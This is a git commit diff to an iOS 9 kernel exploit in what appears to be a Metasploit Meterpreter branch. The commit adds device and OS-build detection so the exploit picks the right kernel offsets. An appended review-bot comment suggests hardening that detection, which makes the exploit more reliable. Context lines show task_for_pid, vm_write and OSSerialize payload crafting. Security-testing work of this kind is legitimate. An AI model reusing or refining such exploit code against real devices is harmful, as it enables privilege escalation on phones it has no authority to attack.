fix offset detection

GSoC/Meterpreter_Web_Console
Tim W 2018-10-16 16:32:26 +08:00
parent 2e91ec1495
commit 981b527692
1 changed files with 46 additions and 6 deletions


@ -22,6 +22,8 @@
#include <netinet/in.h> #include <netinet/in.h>
#include <arpa/inet.h> #include <arpa/inet.h>
#include <sys/utsname.h>
#include <mach/mach.h> #include <mach/mach.h>
#include <IOKit/IOKitLib.h> #include <IOKit/IOKitLib.h>
@ -3614,9 +3616,8 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
DLSYM_FUNC(setreuid, libsystem, int, uid_t ruid, uid_t euid); DLSYM_FUNC(setreuid, libsystem, int, uid_t ruid, uid_t euid);
DLSYM_FUNC(getuid, libsystem, uid_t); DLSYM_FUNC(getuid, libsystem, uid_t);
DLSYM_FUNC(posix_spawn, libsystem, int, pid_t *pid, const char *path, const posix_spawn_file_actions_t *file_actions, const posix_spawnattr_t *attrp, char *const argv[], char *const envp[]); DLSYM_FUNC(uname, libsystem, int, struct utsname *buf);
DLSYM_FUNC(system, libsystem, int, char*); DLSYM_FUNC(sysctl, libsystem, int, int *name, u_int namelen, void *oldp, size_t *oldlenp, void *newp, size_t newlen);
DLSYM_FUNC(waitpid, libsystem, pid_t, pid_t pid, int *status, int options);
DLSYM_FUNC(task_for_pid, libsystem, kern_return_t, mach_port_name_t target_tport, int pid, mach_port_name_t *t); DLSYM_FUNC(task_for_pid, libsystem, kern_return_t, mach_port_name_t target_tport, int pid, mach_port_name_t *t);
DLSYM_FUNC(vm_write, libsystem, kern_return_t, vm_map_t target_task, vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); DLSYM_FUNC(vm_write, libsystem, kern_return_t, vm_map_t target_task, vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
@ -3630,8 +3631,48 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
DLSYM_FUNC(unlink, libsystem, int, const char* file); DLSYM_FUNC(unlink, libsystem, int, const char* file);
// Init // Init
/*// TODO fix*/ struct utsname systeminfo;
target_environment = info_to_target_environment("iPhone5,3", "9.3.2"); uname_func(&systeminfo);
debug_print("Found device: %s\n", systeminfo.machine);
char osname[32];
size_t s = sizeof(osname);
int cmd[2] = { CTL_KERN, KERN_OSVERSION };
if(sysctl_func(cmd, sizeof(cmd) / sizeof(*cmd), osname, &s, NULL, 0) != 0) {
debug_print("%s\n", "Could not detect device version");
return;
}
bool pre91 = false;
const char* osversion = 0;
debug_print("Found version: %s\n", osname);
if (osname[2] == 'A') {
osversion = "9.0.2";
pre91 = true;
} else if (osname[2] == 'B') {
osversion = "9.1";
} else if (osname[2] == 'C') {
osversion = "9.2";
} else if (osname[2] == 'D') {
osversion = "9.2.1";
} else if (osname[2] == 'E') {
osversion = "9.3";
} else if (osname[2] == 'F') {
osversion = "9.3.2";
} else if (osname[2] == 'G') {
osversion = "9.3.3";
} else {
debug_print("%s\n", "Unsupported version");
return;
}
debug_print("Guessed version for offsets: %s\n", osversion);
target_environment = info_to_target_environment(systeminfo.machine, osversion);
if (!target_environment) {
debug_print("%s\n", "Unsupported version");
return;
}
const char *lock_last_path_component = "/tmp/lock"; const char *lock_last_path_component = "/tmp/lock";
char *home = getenv_func("HOME"); char *home = getenv_func("HOME");
@ -3740,7 +3781,6 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
memcpy_func(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature)); memcpy_func(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature));
bufpos = sizeof(kOSSerializeBinarySignature); bufpos = sizeof(kOSSerializeBinarySignature);
bool pre91 = false;
WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 0x10); WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 0x10);
if (pre91) if (pre91)
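Review bot: In the version-detection hunk (`@ -3630,8 +3631,48`), the branch on `osname[2]` reads the third byte of a buffer that is neither zero-initialized nor checked against the returned length `s`, and it ignores the first two characters of the build string, so a build from a different major release whose letter happens to match (e.g. a `14A…` build) would be mapped to `"9.0.2"` and wrong offsets would be used. The iOS 9 builds these letters correspond to all carry the `13` prefix, so declare `char osname[32] = {0};` and add, after the sysctl succeeds, `if (s < 3 || osname[0] != '1' || osname[1] != '3') { debug_print("%s\n", "Unsupported version"); return; }` before the letter chain. The `uname_func(&systeminfo)` return value at the top of the same hunk is also unchecked, so `systeminfo.machine` may be uninitialized when it reaches `info_to_target_environment`; at minimum treat a non-zero return like the sysctl failure. `init_exploit` begins and ends outside the visible hunks.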